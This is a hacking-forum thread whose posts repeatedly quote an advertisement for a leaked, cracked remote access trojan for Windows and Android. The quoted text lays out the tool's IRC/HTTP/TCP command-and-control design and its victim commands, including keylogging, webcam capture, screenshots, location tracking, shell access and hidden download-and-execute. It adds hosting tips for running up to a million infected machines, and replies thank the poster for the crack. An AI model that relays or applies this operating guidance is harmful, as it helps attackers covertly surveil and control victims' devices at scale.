This post is by a banned member (Vy0k) - Unhide
26 February, 2019 - 09:43 PM
Reply
(19 February, 2019 - 02:40 PM)Forlax Wrote: Show More
This is "a multi protocol multi operating system" remote adminstration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first- Unlimited number of machines to control.
- Extreme reliability.
- Android and Windows control at the same time.
- No port forwarding "IRC,HTTP".
How it works ?
First the agent connect to HTTP server the login into some random IRC servers ,then store the usernames and server in the database throgh HTTP.affter that the attcker can load these server and connect to the agent throgh IRC , then to enable TCP the attacker send TCP command throgh IRC to start on demand TCP connection.
Does it require anything?
Yes. .NET framework 4.5 or higher. Java 1.8 or above. And for TCP connection you need to port forward port "1616"
Quick Setup:
More Details and FAQ:
Show ContentSpoiler:
Android Build
[Video: https://youtu.be/nPOXBrjg35o]
HTTP Features
Here you can set tasks to all Agents to run tasks inclunding windows agents andandroid agents.
[Image: Main_10.png]
Here you can set tasks to only the selected Agents to run tasks.
[Image: Main_11.png]HTTP Tasks Types
- Download And excute
- Show Message Box
- Visit Website
- Shell Commands
IRC Features
[Image: Main_12.png]
- WINDOWS COMMANDS
- [pwd] Show current directory.
- [screenshot] Take a screenshot to from the target machine.
- [opencd] Open cd rom.
- [closecd] Close cd rom.
- [ping] Ping the agent machine to check if still active.
- [camlist] Get a list of available camera devices.
- [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
- [location] Get geo location information based on 'ipinfo.com'.
- [opencd] Open cd rom.
- [keylogs] Get agent saved keylogs through HTTP drop point.
- [shell] Run shell commands.
- [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
- [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
- [uninstall] Uninstall the agent completely from the target machine.
- ANDROID COMMANDS
- [msg] Show toast message.
- [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
- [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
- [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
- [ping] Ping the agent machine to check if still active.
- [location] Get geo location information based on 'ipinfo.com'.
- [flashon] Turn the dvice flash on.
- [flashoff] Turn the dvice flash on.
- [wakeup] Turn dvice screen on.
- [screenshot] Take a screenshot to from the target machine.
- GENERAL COMMANDS
- [help] Show list of all available commands and their informations.
- [clear] Clear the terminal.
- [opacity] Change the transparency of the terminal eg : 'opacity 0.4'.
- [myip] Show your public ip address that currently in use.
- [showtcpport] Show the public port used for TCP communications.
- [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'.
- [ping] Ping the agent machine to check if still active.
- [info] Tells the agent to identify its machine and return short informations about it.
- [CTRL + C] CTRL + C to cancel any previous commands.
- [flashoff] Turn the dvice flash on.
- [cleanup] Close all windows that created by this control uint.
- [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected.
- [exit] Close the current agent window.
TCP Features "ANDROID"
[Image: Main_13.png]
FAQ
-Im getting 404 file not found
Change your PHP version from 5.1 to 7.1
-My TCP tab is disabled ?
In order to use TCP you must first connect throgh IRC.
-The system just dispers on start up activation ?
You must have .NET 4.5 on your pc.
-Android Build error APK file not found ?
You must update your java version above 1.8.
-What is the best hosting for the SAS.
if you want to handle from 10,000 to 50,000 with high speed for best price this very good hosting : https://www.a2hosting.com/ If you want to go supper extreme above 1000,000 you should go to Amazon AWS EC2 hosting ,the price is very low you only pay for what you use eg: for 1000,000 machine in one month you will bay from 30$ to 35$ with low refresh rate on the agent be careful with the agent refresh rate Here A video how to setup AWS hosting : Click Here
-What will happen to my key ,when i uninstall my SAS ?
Your key will stay active for that computer ,you can use it any time you want.
shoutout to @ItsJahBoyPlank for leaking the files! very good men axaxaxaxaxax
This post is by a banned member (sonypl) - Unhide
26 February, 2019 - 10:14 PM
Reply
(19 February, 2019 - 02:40 PM)Forlax Wrote: Show More
This is "a multi protocol multi operating system" remote adminstration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first- Unlimited number of machines to control.
- Extreme reliability.
- Android and Windows control at the same time.
- No port forwarding "IRC,HTTP".
How it works ?
First the agent connect to HTTP server the login into some random IRC servers ,then store the usernames and server in the database throgh HTTP.affter that the attcker can load these server and connect to the agent throgh IRC , then to enable TCP the attacker send TCP command throgh IRC to start on demand TCP connection.
Does it require anything?
Yes. .NET framework 4.5 or higher. Java 1.8 or above. And for TCP connection you need to port forward port "1616"
Quick Setup:
More Details and FAQ:
Show ContentSpoiler:
Android Build
[Video: https://youtu.be/nPOXBrjg35o]
HTTP Features
Here you can set tasks to all Agents to run tasks inclunding windows agents andandroid agents.
[Image: Main_10.png]
Here you can set tasks to only the selected Agents to run tasks.
[Image: Main_11.png]HTTP Tasks Types
- Download And excute
- Show Message Box
- Visit Website
- Shell Commands
IRC Features
[Image: Main_12.png]
- WINDOWS COMMANDS
- [pwd] Show current directory.
- [screenshot] Take a screenshot to from the target machine.
- [opencd] Open cd rom.
- [closecd] Close cd rom.
- [ping] Ping the agent machine to check if still active.
- [camlist] Get a list of available camera devices.
- [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
- [location] Get geo location information based on 'ipinfo.com'.
- [opencd] Open cd rom.
- [keylogs] Get agent saved keylogs through HTTP drop point.
- [shell] Run shell commands.
- [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
- [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
- [uninstall] Uninstall the agent completely from the target machine.
- ANDROID COMMANDS
- [msg] Show toast message.
- [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
- [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
- [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
- [ping] Ping the agent machine to check if still active.
- [location] Get geo location information based on 'ipinfo.com'.
- [flashon] Turn the dvice flash on.
- [flashoff] Turn the dvice flash on.
- [wakeup] Turn dvice screen on.
- [screenshot] Take a screenshot to from the target machine.
- GENERAL COMMANDS
- [help] Show list of all available commands and their informations.
- [clear] Clear the terminal.
- [opacity] Change the transparency of the terminal eg : 'opacity 0.4'.
- [myip] Show your public ip address that currently in use.
- [showtcpport] Show the public port used for TCP communications.
- [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'.
- [ping] Ping the agent machine to check if still active.
- [info] Tells the agent to identify its machine and return short informations about it.
- [CTRL + C] CTRL + C to cancel any previous commands.
- [flashoff] Turn the dvice flash on.
- [cleanup] Close all windows that created by this control uint.
- [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected.
- [exit] Close the current agent window.
TCP Features "ANDROID"
[Image: Main_13.png]
FAQ
-Im getting 404 file not found
Change your PHP version from 5.1 to 7.1
-My TCP tab is disabled ?
In order to use TCP you must first connect throgh IRC.
-The system just dispers on start up activation ?
You must have .NET 4.5 on your pc.
-Android Build error APK file not found ?
You must update your java version above 1.8.
-What is the best hosting for the SAS.
if you want to handle from 10,000 to 50,000 with high speed for best price this very good hosting : https://www.a2hosting.com/ If you want to go supper extreme above 1000,000 you should go to Amazon AWS EC2 hosting ,the price is very low you only pay for what you use eg: for 1000,000 machine in one month you will bay from 30$ to 35$ with low refresh rate on the agent be careful with the agent refresh rate Here A video how to setup AWS hosting : Click Here
-What will happen to my key ,when i uninstall my SAS ?
Your key will stay active for that computer ,you can use it any time you want.
shoutout to @ItsJahBoyPlank for leaking the files! The world lov u!!!
HOPE YOU WILL LIKES GUYS  ! PLZ DON T FORGET TO LIKE ! PLZ DON T FORGET TO LIKE  !
AND DO ONLY WHAT YOU LOVE !!!!! !
AND DO ONLY WHAT YOU LOVE !!!!! 
This post is by a banned member (ssahraoui7511) - Unhide
27 February, 2019 - 04:15 PM
Reply
my dream is here
thx for cracking this tools
wooooow
This post is by a banned member (arsium) - Unhide
27 February, 2019 - 09:23 PM
Reply
This post is by a banned member (keane201) - Unhide
02 March, 2019 - 01:47 AM
Reply
This post is by a banned member (Burna) - Unhide
02 March, 2019 - 02:04 AM
Reply
Thannks a lot for cracking this
This post is by a banned member (sjvvajk) - Unhide
05 March, 2019 - 03:12 AM
Reply
This post is by a banned member (cs007) - Unhide
05 March, 2019 - 03:50 PM
Reply
(19 February, 2019 - 02:55 PM)Kepec Wrote: Show More (19 February, 2019 - 02:40 PM)Forlax Wrote: Show More
This is "a multi protocol multi operating system" remote adminstration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first- Unlimited number of machines to control.
- Extreme reliability.
- Android and Windows control at the same time.
- No port forwarding "IRC,HTTP".
How it works ?
First the agent connect to HTTP server the login into some random IRC servers ,then store the usernames and server in the database throgh HTTP.affter that the attcker can load these server and connect to the agent throgh IRC , then to enable TCP the attacker send TCP command throgh IRC to start on demand TCP connection.
Does it require anything?
Yes. .NET framework 4.5 or higher. Java 1.8 or above. And for TCP connection you need to port forward port "1616"
Quick Setup:
More Details and FAQ:
Show ContentSpoiler:
Android Build
[Video: https://youtu.be/nPOXBrjg35o]
HTTP Features
Here you can set tasks to all Agents to run tasks inclunding windows agents andandroid agents.
[Image: Main_10.png]
Here you can set tasks to only the selected Agents to run tasks.
[Image: Main_11.png]HTTP Tasks Types
- Download And excute
- Show Message Box
- Visit Website
- Shell Commands
IRC Features
[Image: Main_12.png]
- WINDOWS COMMANDS
- [pwd] Show current directory.
- [screenshot] Take a screenshot to from the target machine.
- [opencd] Open cd rom.
- [closecd] Close cd rom.
- [ping] Ping the agent machine to check if still active.
- [camlist] Get a list of available camera devices.
- [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
- [location] Get geo location information based on 'ipinfo.com'.
- [opencd] Open cd rom.
- [keylogs] Get agent saved keylogs through HTTP drop point.
- [shell] Run shell commands.
- [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
- [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
- [uninstall] Uninstall the agent completely from the target machine.
- ANDROID COMMANDS
- [msg] Show toast message.
- [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
- [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
- [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
- [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
- [ping] Ping the agent machine to check if still active.
- [location] Get geo location information based on 'ipinfo.com'.
- [flashon] Turn the dvice flash on.
- [flashoff] Turn the dvice flash on.
- [wakeup] Turn dvice screen on.
- [screenshot] Take a screenshot to from the target machine.
- GENERAL COMMANDS
- [help] Show list of all available commands and their informations.
- [clear] Clear the terminal.
- [opacity] Change the transparency of the terminal eg : 'opacity 0.4'.
- [myip] Show your public ip address that currently in use.
- [showtcpport] Show the public port used for TCP communications.
- [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'.
- [ping] Ping the agent machine to check if still active.
- [info] Tells the agent to identify its machine and return short informations about it.
- [CTRL + C] CTRL + C to cancel any previous commands.
- [flashoff] Turn the dvice flash on.
- [cleanup] Close all windows that created by this control uint.
- [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected.
- [exit] Close the current agent window.
TCP Features "ANDROID"
[Image: Main_13.png]
FAQ
-Im getting 404 file not found
Change your PHP version from 5.1 to 7.1
-My TCP tab is disabled ?
In order to use TCP you must first connect throgh IRC.
-The system just dispers on start up activation ?
You must have .NET 4.5 on your pc.
-Android Build error APK file not found ?
You must update your java version above 1.8.
-What is the best hosting for the SAS.
if you want to handle from 10,000 to 50,000 with high speed for best price this very good hosting : https://www.a2hosting.com/ If you want to go supper extreme above 1000,000 you should go to Amazon AWS EC2 hosting ,the price is very low you only pay for what you use eg: for 1000,000 machine in one month you will bay from 30$ to 35$ with low refresh rate on the agent be careful with the agent refresh rate Here A video how to setup AWS hosting : Click Here
-What will happen to my key ,when i uninstall my SAS ?
Your key will stay active for that computer ,you can use it any time you want.
shoutout to @ItsJahBoyPlank for leaking the files!
upgraded only feelsbadman :monkas: :monkas:
the crack should work
|


![[Image: SKLK4JR.png]](https://i.imgur.com/SKLK4JR.png)
![[Image: OmREXUO.png]](https://i.imgur.com/OmREXUO.png)
![[Image: yyS4E52.png]](https://i.imgur.com/yyS4E52.png)
 !
! !
!